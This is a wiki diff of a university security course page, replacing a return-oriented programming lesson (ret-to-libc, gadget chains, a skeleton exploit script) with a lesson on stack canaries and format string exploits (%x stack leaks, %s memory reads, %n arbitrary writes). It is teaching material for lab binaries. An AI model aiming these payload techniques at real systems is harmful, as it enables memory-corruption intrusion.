This shows you the differences between two versions of the page.
Both sides previous revision Previous revision Next revision | Previous revision | ||
session:11 [2020/07/08 09:32] Liza-Elena BABU (78556) [1. Challenge - Gadget tutorial] |
session:11 [2020/07/19 12:49] (current) |
||
---|---|---|---|
Line 1: | Line 1: | ||
- | = 0x08. Return Oriented Programming | + | ====== 0x0A: Information Leaks ====== |
- | == Resources | + | ===== Slides ===== |
- | [[https:// | + | ===== Resources ===== |
- | [[https:// | + | [[https:// |
- | [[https://security.cs.pub.ro/summer-school/res/arc/11-return-oriented-programming-full.zip|Session' | + | [[https://github.com/hexcellents/ |
+ | ===== Stack Protection (Canaries) ===== | ||
- | === Executable Space Protection | + | The name comes from canaries (birds) that were used by mining workers when entering mines and were affected by any deadly gases such as methane before humans were. In our case, stack canaries are used to check if a buffer overflow of a stack variable resulted in overriding the return address. The mechanism is based on a (sometimes random) value that is placed on each function' |
- | The **executable space protection** is an instance of the **principle of least privilege**, | + | {{ :session: |
- | The mechanism | + | There are 3 main variations of this mechanism: |
- | **NX bit:** This is the easiest method, and involves an extra bit added to each page table entry that specifies if the memory | + | **Random** canaries are generated when programs start, and are stored in a global variable. The global variable //can// be located in a memory region surrounded by unmapped pages - this protects against information leak attacks (see next section) |
- | **Physical Address Extension (PAE):** Besides | + | The **terminator** canaries contain string termination characters such as '' |
- | **Emulation:** The NX bit can be emulated on older (i.e., non-PAE) 32-bit processors by overloading | + | The **random XOR** canaries work by applying a XOR-based algorithm having both a random number |
< | < | ||
- | This security feature gets in the way of **just-in-time (JIT)** compilers, which need to produce and write code at runtime, and that is later executed. Since a JIT compiler cannot run in this kind of secured environment, | + | **crt0.o** is a set of initialization routines linked into compiled C programs, and executed before calling '' |
- | + | ||
- | * Slides: | + | |
- | * Paper: [[http:// | + | |
</ | </ | ||
- | There are of course other implementations in different hardening-oriented projects such as: OpenBSD [[http:// | + | The 3 well known implementations of stack protections |
- | === Bypassing NX | + | ==== StackGuard ==== |
- | **ret-to-plt/libc.** You can return to the '' | + | The [[https://www.usenix.org/ |
- | + | ||
- | **Return Oriented Programming (ROP).** This is a generalization of the ret-to-* approach that makes use of existing code to execute almost anything. As this is probably one of the most common types of attacks, | + | |
- | + | ||
- | **mprotect().** If the application is using '' | + | |
- | + | ||
- | < | + | |
- | Today we will talk about the first 2 methods to bypass NX. **mprotect()** will be introduced in the next sessions. | + | |
- | </ | + | |
- | + | ||
- | === Address Space Layout Randomization (ASLR) | + | |
- | + | ||
- | Address Space Layout Randomization (ASLR) | + | |
<note important> | <note important> | ||
- | Linux allows 3 options for its ASLR implementation that can be configured using the '' | + | [[http://courses.cs.washington.edu/courses/cse504/ |
- | * **0**: deactivated | + | |
- | * **1**: random stack, vdso, libraries; heap is after code section; random code section (only for PIE-linked binaries) | + | |
- | * **2**: random heap too | + | |
</ | </ | ||
- | Make sure you reactivate ASLR after the previous section of the tutorial, by one of the two options below. | + | ==== StackShield ==== |
- | If you disabled ASLR system-wide, re-enable it using (root access | + | The most notable feature of StackShield, compared to other implementations, |
- | <code bash> | + | ==== ProPolice ==== |
- | ~$ sudo bash -c 'echo 2 > / | + | |
- | </ | + | |
- | If you disabled ASLR at shell level, simply **close | + | ProPolice, proposed by IBM, started from an implementation similar to StackGuard, but evolved and introduced new features. It is currently |
- | We can easily demonstrate the effects on shared libraries by running '' | + | {{ : |
- | ==== PLT and GOT | + | < |
+ | GCC supports 3 levels of stack smashing protection: complete, normal, | ||
+ | </ | ||
- | ASLR is not the only feature that prevents the compiler and the linker from solving some relocations before the binary is actually running. Shared libraries can also be combined in different ways, so the first time you actually know the address of a shared library is while the loader is running. The ASLR feature is orthogonal to this - the loader could choose to assign address to libraries in a round-robin fashion, or could use ASLR to assign them randomly. | + | Let's compile |
- | Of course, we might be inclined to have the loader simply fix all relocations in the code section after it loaded the libraries, but this breaks the memory access protection of the '' | + | <file c ssp.c> |
+ | void func() { | ||
+ | char buffer[1337]; | ||
+ | return; | ||
+ | } | ||
- | To solve this problems we need another level of indirection: | + | int main() { |
+ | func(); | ||
+ | return 0; | ||
+ | } | ||
+ | </ | ||
- | The PLT is responsible of finding | + | Compile |
- | + | ||
- | Let's take a quick look at the code generated for a shared library call. You can use any binary you like, we'll just show an example from one that simply calls '' | + | |
<code bash> | <code bash> | ||
- | ~$ objdump | + | ~$ CFLAGS=' |
- | </ | + | |
- | <code text> | + | |
- | | + | |
</ | </ | ||
- | We can see that the '' | + | The disassembled code for '' |
<code bash> | <code bash> | ||
- | ~$ readelf | + | ~$ objdump |
</ | </ | ||
- | < | + | < |
- | ... | + | 0804841b < |
- | [12] .plt | + | 804841b: |
- | ... | + | |
+ | | ||
+ | | ||
+ | | ||
+ | | ||
+ | | ||
+ | | ||
+ | | ||
+ | | ||
+ | | ||
+ | | ||
+ | 8048442: | ||
</ | </ | ||
- | Let' | + | We can observe the random value being read from '' |
- | <code bash> | + | <file text canary.gdb> |
- | ~$ objdump -D -j .plt -M intel hello | grep -A 3 '< | + | set disassembly-flavor |
- | </ | + | file ssp |
- | + | break *0x804842a | |
- | <code text> | + | commands |
- | 080482f0 < | + | p/x $eax |
- | 80482f0: ff 25 00 a0 04 08 jmp DWORD PTR ds: | + | c |
- | 80482f6: 68 00 00 00 00 | + | end |
- | 80482fb: e9 e0 ff ff ff | + | run |
- | </code> | + | quit |
+ | </file> | ||
- | We see it jumping to a pointer stored at '' | + | Run using: |
<code bash> | <code bash> | ||
- | ~$ readelf | + | ~$ gdb -x canary.gdb ssp |
</ | </ | ||
- | <code text> | + | ==== Defeating Canaries ==== |
- | ... | + | |
- | Relocation section ' | + | |
- | | + | |
- | 0804a000 | + | |
- | ... | + | |
- | </ | + | |
- | Ok, good, but what is actually | + | This [[http:// |
- | <code bash> | + | For example, the attacker might target: |
- | ~$ objdump -s -M intel -j .got.plt --start-address=0x0804a000 hello | + | * parameters function pointers (pushed onto the stack before calling functions) |
- | </ | + | * the return |
+ | * the old base pointer | ||
+ | * a plain function pointer (local variable) | ||
- | <code text> | + | Buffers could be stored either on the stack, the heap or '' |
- | hello: | + | |
- | Contents of section .got.plt: | + | <note important> |
- | 804a000 f6820408 06830408 16830408 | + | Note that attacks can also be carried out via indirect pointers. The attacker could target a stack local variable, without trying to change the return value, that is later used as a pointer in a write operation. If this write can be fully controlled, the attacker can change the return address without even writing over the canary. |
- | </code> | + | </note> |
- | We recognize '' | + | Besides indirect attacks, stack canaries can also be defeated if the attacker |
- | <code bash> | ||
- | ~$ objdump -D -j .plt -M intel hello | grep -A 3 ' | ||
- | </ | ||
- | <code text> | + | ===== Format String Exploits ===== |
- | 080482e0 < | + | |
- | | + | |
- | | + | |
- | | + | |
- | </ | + | |
- | < | + | < |
- | Going further into the resolver | + | In the following, '' |
+ | This formality arises from this paper on [[https:// | ||
</ | </ | ||
- | What's going on here? What's actually happening | + | The scenario that enables format string vulnerabilities |
+ | Eg. | ||
- | === 00. Tutorial - Bypass NX Stack with return-to-libc | + | <code C> |
+ | void print_something(char* user_input) | ||
+ | { | ||
+ | printf(user_input); | ||
+ | } | ||
+ | </ | ||
- | Go to the '' | + | vs. |
- | In the previous sessions we used stack overflow vulnerabilities to inject new code into a running process | + | <code C> |
- | + | void print_something(char* user_input) | |
- | We will try to bypass this protection for the '' | + | { |
- | + | | |
- | < | + | } |
- | setarch $(uname -m) -R /bin/bash | + | |
</ | </ | ||
+ | ==== Format functions ==== | ||
+ | A number of format functions are defined in the ANSI C definition. There are some basic format string functions on which more complex functions are based on, some of which are not part of the standard but are widely available. | ||
+ | Real family members: | ||
+ | * fprintf — prints to a FILE stream | ||
+ | * printf — prints to the ‘stdout’ stream | ||
+ | * sprintf — prints into a string | ||
+ | * snprintf — prints into a string with length checking | ||
+ | * vfprintf — print to a FILE stream from a va_arg structure | ||
+ | * vprintf — prints to ‘stdout’ from a va_arg structure | ||
+ | * vsprintf — prints to a string from a va_arg structure | ||
+ | * vsnprintf — prints to a string with length checking from a va_arg structure | ||
- | Let's take a look at the program headers and confirm that the stack is no longer executable. We only have read and write (RW) permissions for the stack area. | + | == Relatives: == |
+ | * setproctitle — set argv[] | ||
+ | * syslog — output to the syslog facility | ||
+ | * others like err*, verr*, warn*, vwarn* | ||
- | <note important> | + | === Use of format functions === |
- | The auth binary requires the '' | + | To understand where this vulnerability is common in C code, we have to examine the purpose of format functions. |
- | You can find '' | + | == Functionality == |
- | </ | + | * used to convert simple C datatypes to a string representation |
+ | * allow to specify the format of the representation | ||
+ | * process the resulting string (output to stderr, stdout, syslog, | ||
- | <code bash> | + | == How the format function works == |
- | $ checksec 1-random | + | * the format string controls the behaviour of the function |
- | | + | * it specifies the type of parameters |
- | NX: NX enabled | + | |
- | [...] | + | * saved either directly |
- | </ | + | |
- | For completeness, | + | |
- | < | + | |
- | $ python -c 'print " | + | |
- | [0x80484f1] __libc_start_main(0x80486af, 1, 0xbffff454, 0x80486c0, 0x8048730 < | + | |
- | [0x8048601] malloc(20) = 0x0804b008 | + | |
- | [0x80485df] puts("Enter password: "Enter password: | + | |
- | ) = 17 | + | |
- | [0x80485ea] gets(c, 0x8048601, 0x80486af, 0xb7cdecb0, 0xb7cdecb7) | + | |
- | [0x8048652] memset(0x0804b008, ' | + | |
- | [0x8048671] SHA1(0xbfffee63, | + | |
- | [0x41414141] --- SIGSEGV (Segmentation fault) --- | + | |
- | [0xffffffff] +++ killed by SIGSEGV +++ | + | |
- | </ | + | |
- | Check the source file - the buffer length is '' | + | == The calling function == |
+ | * has to know how many parameters | ||
- | We can now jump anywhere. Unfortunately, | + | === What exactly |
- | < | + | A format string |
- | $ python -c 'print " | + | Example: |
- | [0x80484f1] __libc_start_main(0x80486af, | + | < |
- | [0x8048601] malloc(20) | + | printf |
- | [0x80485df] puts("Enter password: "Enter password: | + | |
- | ) = 17 | + | |
- | [0x80485ea] gets(0xbfffee63, 0x8048601, 0x80486af, 0xb7cdecb0, 0xb7cdecb7) = 0xbfffee63 | + | |
- | [0x8048652] memset(0x0804b008, | + | |
- | [0x8048671] SHA1(0xbfffee63, | + | |
- | [0xbfffee63] --- SIGSEGV (Segmentation fault) --- | + | |
- | [0xffffffff] +++ killed by SIGSEGV +++ | + | |
</ | </ | ||
- | Oh, such a bummer! It didn't work. How about we try to jump to some existing code? | + | The text to be printed is "The magic number is:", |
- | < | + | <code>The magic number is: 1911</ |
- | $ objdump -d auth | grep -A 15 "< | + | |
- | 080485ec < | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | 804861b: c7 04 24 01 00 00 00 movl | + | |
- | | + | |
- | | + | |
- | | + | |
- | </ | + | |
- | Lets try '' | + | |
- | < | + | |
- | $ python -c 'print " | + | |
- | [0x80485df] puts(" | + | |
- | ) = 17 | + | |
- | [0x804861b] puts(" | + | |
- | ) = 14 | + | |
- | [0xffffffff] +++ exited (status 1) +++ | + | |
- | </ | + | Some format parameters: |
- | === Return Oriented Programming | + | |
- | {{ : | + | ^ Parameter |
+ | | %d | decimal(int) | ||
+ | | %u | unsigned decimal (unsigned int) | value | | ||
+ | | %x | hexadecimal (unsigned int) | value | | ||
+ | | %s | string ( char *) | reference | ||
+ | | %n | number of bytes written so far, (* int) | reference | ||
- | ==== Motivation | + | The '\' |
- | In the previous sessions we discussed | + | Example: |
- | < | + | < |
- | RET + 0x00: addr of system | + | printf ("The magic number is: \x25d\n", |
- | RET + 0x04: | + | |
- | RET + 0x08: | + | |
</ | </ | ||
+ | The code above works, because ' | ||
- | However, what happens when you need to call multiple functions? Say you need to call f1() and then f2(0xAB, 0xCD)? | + | ==== The stack and its role at format strings ==== |
- | < | + | The behaviour |
- | RET + 0x00: | + | < |
- | RET + 0x04: addr of f2 (return address after f1 finishes) | + | printf |
- | RET + 0x08: JUNK (return address after f2 finishes: we don't care about what happens after the 2 functions are called) | + | |
- | RET + 0x0c: 0xAB (param1 of f2) | + | |
- | RET + 0x10: 0xCD (param2 of f2) | + | |
- | </code> | + | |
- | What about if we need to call f1(0xAB, 0xCD) and then f2(0xEF, 0x42) ? | + | |
- | < | + | |
- | RET + 0x00: addr of f1 | + | |
- | RET + 0x04: addr of f2 (return address after f1 finishes) | + | |
- | RET + 0x08: 0xAB (param1 of f1) | + | |
- | RET + 0x0c: 0xCD (param2 of f1) but this should also be 0xEF (param1 of f2) | + | |
- | RET + 0x10: 0x42 (param2 of f2) | + | |
</ | </ | ||
- | This kind of conflict can be resolved using Return Oriented Programming, | + | From within the '' |
+ | {{ : | ||
- | ==== NOP analogy | + | The format function now parses the format string |
- | While '' | + | should be evaluated. The string " |
- | Let's explore an example: | + | |
- | <code c> | + | |
- | int main() | + | |
- | { | + | |
- | char a[16]; | + | |
- | read(0, a, 100); | + | |
- | return 0; | + | ==== What do we control? ==== |
- | } | + | Through supplying the format string we are able to control the behaviour of the format function. We now have to examine what exactly we are able to control, and how to use this control to extend this partial control over |
+ | the process to full control of the execution flow. | ||
+ | ==== Crash of the program ==== | ||
+ | By utilizing format strings we can easily trigger some invalid pointer access by just supplying a format string like: | ||
+ | <code C> | ||
+ | printf (" | ||
</ | </ | ||
- | This code obviously suffers | + | Because ' |
- | Remember the NOP sled concept from previous sessions? These were long chains of NOP instructions (" | + | implementations offer the ' |
- | Since we can't add any new code to the program (NX is enabled) how could we simulate the effect of a NOP sled? Easy! Using return instructions! | + | ==== Viewing the stack ==== |
- | < | + | We can show some parts of the stack memory by using a format string like this: |
- | # objdump | + | < |
- | | + | printf (" |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
</ | </ | ||
- | Any and all of these addresses will be ok. The payload could be the following: | + | This works, because we instruct the printf-function to retrieve five parameters from the stack and display them as 8-digit padded hexadecimal numbers. So a possible output may look like: |
< | < | ||
- | RET + 0x00: | + | 40012980.080628c4.bffff7a4.00000005.08059c04 |
- | RET + 0x04: | + | |
- | RET + 0x08: | + | |
- | RET + 0x0c: | + | |
- | RET + 0x10: | + | |
- | ..... | + | |
</ | </ | ||
- | The original ret (in the normal code flow) will pop RET+0x00 off the stack and jump to it. When it gets popped | + | This is a partial dump of the stack memory, starting from the current bottom of the stack towards the top — assuming the stack grows towards the low addresses. Depending on the size of the format string buffer and the size of the output buffer, you can reconstruct more or less large parts of the stack memory |
+ | A stack dump gives important information about the program flow and local function variables and may be very helpful for finding the correct offsets for a successful exploitation. | ||
+ | ==== Viewing memory | ||
+ | It is also possible to peek at memory locations different from the stack memory. To do this we have to get the format function to display memory from an address we can supply. | ||
+ | This poses two problems to us: | ||
+ | * First, we have to find a format parameter which uses an address | ||
+ | * Secondly, we have to supply | ||
+ | We are lucky in the first case, since the '%s' | ||
+ | So the remaining problem is, how to get that address on the stack, into the right place. | ||
- | That payload is not the only option. We don't really care which '' | ||
- | < | ||
- | RET + 0x00: | ||
- | RET + 0x04: | ||
- | RET + 0x08: | ||
- | RET + 0x0c: | ||
- | RET + 0x10: | ||
- | ..... | ||
- | </ | ||
- | Notice the addresses are different but because they all point to a '' | ||
- | <note warning> | + | Our format string is usually located on the stack itself, so we already have near to full control over the space where the format string lies. |
- | Take a moment | + | The format function internally maintains |
- | Follow along using this skeleton | + | If we would be able to get this pointer pointing into a memory space we can control, we can supply an address to the ' |
+ | <note important> | ||
+ | For re-creating the following attack you should place the string passed to '' | ||
</ | </ | ||
- | <file python skel.py> | + | To modify the stack pointer we can simply use dummy parameters that will ' |
- | #!/usr/ | + | <code C> |
- | import struct, sys | + | printf (" |
+ | </code> | ||
+ | The ' | ||
+ | After more or less of this increasing parameters the stack pointer points into our memory: the format string itself. | ||
+ | The format function always maintains the lowest stack frame, so if our buffer lies on the stack at all, it lies above the current stack pointer for sure. | ||
+ | If we choose the number of ‘%08x’ parameters correctly, we could just display memory from an arbitrary address, by appending ' | ||
- | def dw(i): | + | In our case the address is illegal and would be ' |
- | return struct.pack("< | + | Example: |
- | #TODO update count for your prog | ||
- | pad_count_to_ret = 100 | ||
- | payload = " | ||
- | |||
- | #TODO figure out the rop chain | ||
- | payload += dw(0xcafebeef) | ||
- | payload += dw(0xdeadc0de) | ||
- | |||
- | |||
- | sys.stdout.write(payload) | ||
- | |||
- | </ | ||
- | |||
- | |||
- | ==== Gadgets & ROP chains | ||
- | Now that we have a sort of neutral primitive equivalent to a NOP let's actually do something useful. | ||
- | The building blocks of ROP payloads are called gadgets. These are blocks of instructions that end with a ' | ||
- | Here are some ' | ||
< | < | ||
- | 0x8048443: pop ebp; ret | + | address = 0x08480110 |
- | 0x80484a7: pop edi; pop ebp; ret | + | address (encoded as 32 bit le string): " |
- | 0x8048441: mov ebp,esp; pop ebp; ret | + | |
- | 0x80482da: pop eax; pop ebx; leave; ret | + | |
- | 0x80484c3: pop ecx; pop ebx; leave; ret | + | |
</ | </ | ||
- | By carefully stitching such gadgets on the stack we can bring code execution to almost any context we want. | + | < |
- | As an example let's say we would like to load 0x41424344 into eax and 0x61626364 into ebx. The payload should look like: | + | printf |
- | < | + | |
- | RET + 0x00: | + | |
- | RET + 0x04: | + | |
- | RET + 0x08: | + | |
- | RET + 0x0c: | + | |
</ | </ | ||
- | * First the ret addr is popped from the stack and execution goes there. | ||
- | * At '' | ||
- | * At '' | ||
- | * At '' | ||
- | * At '' | ||
- | We have now seen how gadgets can be useful if we want the CPU to achieve | + | This will dump memory from 0x08480110 until a NULL byte is reached. By increasing the memory address dynamically |
- | As an example, if we want to call f1(0xAB, 0xCD, 0xEF) on x86_64 we first need to know the calling convention for the first three parameters: | + | It is even possible |
- | * 1st param: RDI | + | |
- | * 2nd param: RSI | + | |
- | * 3rd param: RDX | + | |
- | Next we would need gadgets for each. Let's assume these 2 scenarios: | + | |
- | Scenario 1: | + | |
- | < | + | |
- | 0x400124: | + | |
- | 0x400235: | + | |
- | 0x400440: | + | |
- | Payload: | + | If we cannot reach the exact format string boundary by using 4-Byte pops (' |
- | RET + 0x00: | + | This is analog to the alignment in buffer overflow exploits. |
- | RET + 0x08: | + | |
- | RET + 0x10: val of RSI (0xCD) | + | ==== Exploitation - through pure format strings ==== |
- | RET + 0x18: | + | Our goal in the case of exploitation is to be able to control the instruction pointer, i.e we want to extend our very limited control — the ability to control the behaviour of the format function — to real execution control, that is executing our raw machine code. |
- | RET + 0x20: val of RDX | + | Let's take a look at the following code: |
- | RET + 0x28: f1 | + | <code C> |
+ | { | ||
+ | char buffer[512]; | ||
+ | snprintf (buffer, sizeof | ||
+ | buffer[sizeof | ||
+ | } | ||
</ | </ | ||
+ | In the code above it is not possible to enlarge our buffer by inserting some kind of ' | ||
+ | At first it may look as if we cannot do much useful things, except crashing the program and inspecting some memory. | ||
- | Scenario 2: | + | Lets remember the format parameters mentioned. There is the ' |
- | < | + | The address of the variable is given to the format function by placing an integer pointer as parameter onto the stack. |
- | 0x400125: | + | Example: |
- | 0x400252: | + | < |
- | 0x400235: | + | int i; |
- | 0x400440: | + | printf |
- | + | printf | |
- | Payload: | + | |
- | RET + 0x00: | + | |
- | RET + 0x08: val of RDI (0xAB) | + | |
- | RET + 0x10: | + | |
- | RET + 0x18: val of RSI (0xCD) | + | |
- | RET + 0x20: | + | |
- | RET + 0x28: val of RDX | + | |
- | RET + 0x30: f1 | + | |
</ | </ | ||
- | Notice that because the architecture is 64 bits wide, the values on the stack are not dwords but qwords (quad words: 8 bytes wide) | + | Would print "i = 6". With the same method |
- | + | ||
- | + | ||
- | The second use of gadgets is to clear the stack. Remember | + | |
- | We need to call f1(0xAB, 0xCD) and then f2(0xEF, 0x42). Our initial solution was: | + | |
< | < | ||
- | RET + 0x00: addr of f1 | + | " |
- | RET + 0x04: addr of f2 (return address after f1 finishes) | + | |
- | RET + 0x08: 0xAB (param1 of f1) | + | |
- | RET + 0x0c: 0xCD (param2 of f1) but this should also be 0xEF (param1 of f2) | + | |
- | RET + 0x10: 0x42 (param2 of f2) | + | |
</ | </ | ||
- | The problem is that those parameters | + | With the ' |
- | + | We do this until this pointer points | |
- | < | + | The ' |
- | RET + 0x00: addr of f1 | + | But if we supply a correct mapped and writeable address this works and we overwrite four bytes (sizeof |
- | RET + 0x04: addr of (pop eax, pop ebx, ret) | + | |
- | RET + 0x08: | + | |
- | RET + 0x0c: | + | |
- | RET + 0x10: addr of f2 | + | |
- | RET + 0x14: | + | |
- | RET + 0x18: 0xEF (param1 of f2) | + | |
- | RET + 0x1c: 0x42 (param2 of f2) | + | |
- | </ | + | |
- | Now we can even call the next function f3 if we repeat | + | |
< | < | ||
- | RET + 0x00: addr of f1 | + | " |
- | RET + 0x04: addr of (pop eax, pop ebx, ret) | + | |
- | RET + 0x08: 0xAB (param1 of f1) | + | |
- | RET + 0x0c: 0xCD (param2 of f1) | + | |
- | RET + 0x10: addr of f2 | + | |
- | RET + 0x14: addr of (pop eax, pop ebx, ret) | + | |
- | RET + 0x18: 0xEF (param1 of f2) | + | |
- | RET + 0x1c: 0x42 (param2 of f2) | + | |
- | RET + 0x20: addr of f3 | + | |
</ | </ | ||
+ | The format string above will overwrite four bytes at 0xbfffc8c0 with a small integer number. | ||
+ | We have reached one of our goals: we can write to arbitrary addresses. But we cannot control the number we are writing yet — but this will change. | ||
- | === Some useful ninja tricks | + | The number we are writing — the count of characters written by the format function — is dependant on the format string. |
- | + | Since we control the format string, we can at least take influence on this counter, by writing more or less bytes: | |
- | ==== Memory spraying | + | < |
- | Let' | + | int a; |
- | < | + | printf |
- | int main() | + | /* a == 10 */ |
- | { | + | int a; |
- | int x, y ,z; | + | printf |
- | | + | /* a == 150 */ |
- | char buf[23]; | + | |
- | read(0, buf, 100); | + | |
- | + | ||
- | return 0; | + | |
- | } | + | |
</ | </ | ||
+ | By using a dummy parameter ' | ||
+ | But for writing large numbers — such as addresses — this is not sufficient, so we have to find a way to write arbitrary data. | ||
- | A fairly simple overflow, right? How fast can you figure out the offset to the return address? How much padding do you need ? | + | An integer number on the x86 architecture is stored in four bytes, which are little-endian ordered, the least significant byte being the first in memory. |
- | There is a shortcut that you can use to figure this out in under 30 seconds without looking at the assembly. | + | So a number like 0x0000014c is stored |
- | A [[ https:// | + | For the counter |
- | + | Example: | |
- | Peda can help you do this. Here's how: | + | < |
- | < | + | unsigned char foo[4]; |
- | gdb-peda$ help pattern_create | + | printf (" |
- | Generate a cyclic pattern | + | |
- | Usage: | + | |
- | pattern_create size [file] | + | |
- | + | ||
- | gdb-peda$ pattern_create 100 | + | |
- | ' | + | |
- | + | ||
- | gdb-peda$ help pattern_offset | + | |
- | Search for offset of a value in cyclic pattern | + | |
- | Usage: | + | |
- | pattern_offset value | + | |
- | + | ||
- | gdb-peda$ pattern_offset AA8A | + | |
- | AA8A found at offset: 76 | + | |
</ | </ | ||
- | Things can even get more complex: if you insert such patterns as input to the program you can search for signs of where it got placed using peda. Here's how to figure out the offset to the return address in 3 commands for the previous program as promised: | + | When the printf function returns, foo[0] contains |
- | <code bash> | + | |
- | # gdb -q ./a | + | |
- | Reading symbols from ./a...(no debugging symbols found)...done. | + | |
- | gdb-peda$ pattern_create 200 | + | |
- | ' | + | |
- | gdb-peda$ run | + | |
- | AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAlAAMAAmAANAAnAAOAAoAAPAApAAQAAqAARAArAASAAsAATAAtAAUAAuAAVAAvAAWAAwAAXAAxAAYAAyAAZAAzAaaAa0AaBAabAa1A | + | |
- | + | ||
- | Program received signal SIGSEGV, Segmentation fault. | + | |
- | [----------------------------------registers-----------------------------------] | + | |
- | EAX: 0x0 | + | |
- | EBX: 0xf7f97e54 --> 0x1a6d5c | + | |
- | ECX: 0xffffcd49 (" | + | |
- | EDX: 0x64 ('d') | + | |
- | ESI: 0x0 | + | |
- | EDI: 0x0 | + | |
- | EBP: 0x41334141 (' | + | |
- | ESP: 0xffffcd70 (" | + | |
- | EIP: 0x41414541 (' | + | |
- | EFLAGS: 0x10207 (CARRY PARITY adjust zero sign trap INTERRUPT direction overflow) | + | |
- | [-------------------------------------code-------------------------------------] | + | |
- | Invalid $PC address: 0x41414541 | + | |
- | [------------------------------------stack-------------------------------------] | + | |
- | 0000| 0xffffcd70 (" | + | |
- | 0004| 0xffffcd74 (" | + | |
- | 0008| 0xffffcd78 (" | + | |
- | 0012| 0xffffcd7c (" | + | |
- | 0016| 0xffffcd80 (" | + | |
- | 0020| 0xffffcd84 (" | + | |
- | 0024| 0xffffcd88 (" | + | |
- | 0028| 0xffffcd8c (" | + | |
- | 0032| 0xffffcd90 (" | + | |
- | 0036| 0xffffcd94 (" | + | |
- | 0040| 0xffffcd98 (" | + | |
- | 0044| 0xffffcd9c (" | + | |
- | 0048| 0xffffcda0 (" | + | |
- | 0052| 0xffffcda4 (" | + | |
- | 0056| 0xffffcda8 (" | + | |
- | 0060| 0xffffcdac --> 0x6c (' | + | |
- | + | ||
- | [------------------------------------------------------------------------------] | + | |
- | Legend: code, data, rodata, value | + | |
- | Stopped reason: SIGSEGV | + | |
- | 0x41414541 in ?? () | + | |
- | + | ||
- | + | ||
- | + | ||
- | gdb-peda$ pattern_search | + | |
- | Registers contain pattern buffer: | + | |
- | EIP+0 found at offset: 35 | + | |
- | EBP+0 found at offset: 31 | + | |
- | Registers point to pattern buffer: | + | |
- | [ECX] --> offset 0 - size ~100 | + | |
- | [ESP] --> offset 39 - size ~61 | + | |
- | Pattern buffer found at: | + | |
- | 0xffffcd49 : offset | + | |
- | 0xffffd1c6 : offset 23424 - size 4 ($sp + 0x456 [277 dwords]) | + | |
- | 0xffffd1d8 : offset 22930 - size 4 ($sp + 0x468 [282 dwords]) | + | |
- | 0xffffd276 : offset 48535 - size 4 ($sp + 0x506 [321 dwords]) | + | |
- | References to pattern buffer found at: | + | |
- | 0xffffcd20 : 0xffffcd49 ($sp + -0x50 [-20 dwords]) | + | |
- | 0xffffcd34 : 0xffffcd49 ($sp + -0x3c [-15 dwords]) | + | |
+ | But for an address, there are four bytes that we have to control completely. If we are unable to write four bytes at once, we can try to write a byte a time for four times in a row. | ||
+ | On most CISC architectures it is possible to write to unaligned arbitrary addresses. This can be used to write to the second least significant byte of the memory, where the address is stored. | ||
+ | This would look as follows: | ||
+ | <code C> | ||
+ | unsigned char canary[5]; | ||
+ | unsigned char foo[4]; | ||
+ | memset (foo, 0, sizeof (foo)); | ||
+ | /* 0 * before */ strcpy (canary, " | ||
+ | /* 1 */ printf (" | ||
+ | /* 2 */ printf (" | ||
+ | /* 3 */ printf (" | ||
+ | /* 4 */ printf (" | ||
+ | /* 5 * after */ printf (" | ||
+ | foo[2], foo[3]); | ||
+ | printf (" | ||
+ | canary[1], canary[2], canary[3]); | ||
+ | </ | ||
+ | This returns the output " | ||
+ | By increasing the pointer each time, the least significant byte moves through the memory we want to write to, and allows us to store completely arbitrary data. | ||
+ | As you can see in the first row of the following figure, all eight bytes are not touched yet by our overwrite code. | ||
+ | From the second row on we trigger four overwrites, shifted by one byte to the right for every step. | ||
+ | The last row shows the final desired state: we overwrote all four bytes of our foo array, but while doing so, we destroyed three bytes of the canary array. | ||
+ | We included the canary array just to see that we are overwriting memory we do not want to. | ||
+ | {{ : | ||
+ | Although this method looks complex, it can be used to overwrite arbitrary data at arbitrary addresses. | ||
+ | For explanation we have only used one write per format string until now, but it is also possible to write multiple times within one format string: | ||
+ | <code C> | ||
+ | strcpy (canary, " | ||
+ | printf (" | ||
+ | 1, (int *) & | ||
+ | 1, (int *) & | ||
+ | printf (" | ||
+ | foo[2], foo[3]); | ||
+ | printf (" | ||
+ | canary[1], canary[2], canary[3]); | ||
</ | </ | ||
+ | We use the ' | ||
+ | So we only have to add 16 characters instead of 32 to it, to get the results we desire. | ||
+ | This was a special case, in which all the bytes increased throughout the writes. But we could also write '' | ||
- | ==== Vulnerable function identification | + | Since we write integer numbers and the order is little endian, only the least significant byte is important in the writes. |
- | As you can see from above, the base pointer gets trashed so backtracing | + | By using counters of 0x80, 0x140, 0x220 and 0x310 characters respectivly when “%n” is triggered, we can construct |
- | < | + | The code to calculate the desired numberof-written-chars counter |
- | gdb-peda$ bt | + | < |
- | #0 0x41414541 in ?? () | + | write_byte += 0x100; |
- | #1 0x34414165 in ?? () | + | already_written %= 0x100; |
- | #2 0x41464141 in ?? () | + | padding = (write_byte - already_written) % 0x100; |
- | #3 0x41416641 in ?? () | + | if (padding < 10) |
+ | | ||
</ | </ | ||
- | If this program was larger you wouldn' | ||
- | You can set a breakpoint on all declared functions (if the program has not been stripped) using **rbreak** and then ignoring them: | ||
- | <code bash> | ||
- | gdb-peda$ rbreak | ||
- | Breakpoint 1 at 0x80482d4 | ||
- | < | ||
- | Breakpoint 2 at 0x8048310 | ||
- | < | ||
- | Breakpoint 3 at 0x8048320 | ||
- | < | ||
- | Breakpoint 4 at 0x8048330 | ||
- | < | ||
- | Breakpoint 5 at 0x8048340 | ||
- | < | ||
- | Breakpoint 6 at 0x8048370 | ||
- | < | ||
- | Breakpoint 7 at 0x804843f | ||
- | < | ||
- | Breakpoint 8 at 0x8048470 | ||
- | < | ||
- | Breakpoint 9 at 0x80484e0 | ||
- | < | ||
- | Breakpoint 10 at 0x80484e4 | ||
- | < | ||
+ | Where ' | ||
+ | Example: | ||
+ | <code C> | ||
+ | write_byte = 0x7f; | ||
+ | already_written = 30; | ||
+ | write_byte += 0x100; /* write_byte is 0x17f now */ | ||
+ | already_written %= 0x100; /* already_written is 30 */ | ||
- | gdb-peda$ commands | + | /* afterwards padding is 97 (= 0x61) */ |
- | Type commands for breakpoint(s) 1-10, one per line. | + | padding = (write_byte |
- | End with a line saying just " | + | if (padding < 10) |
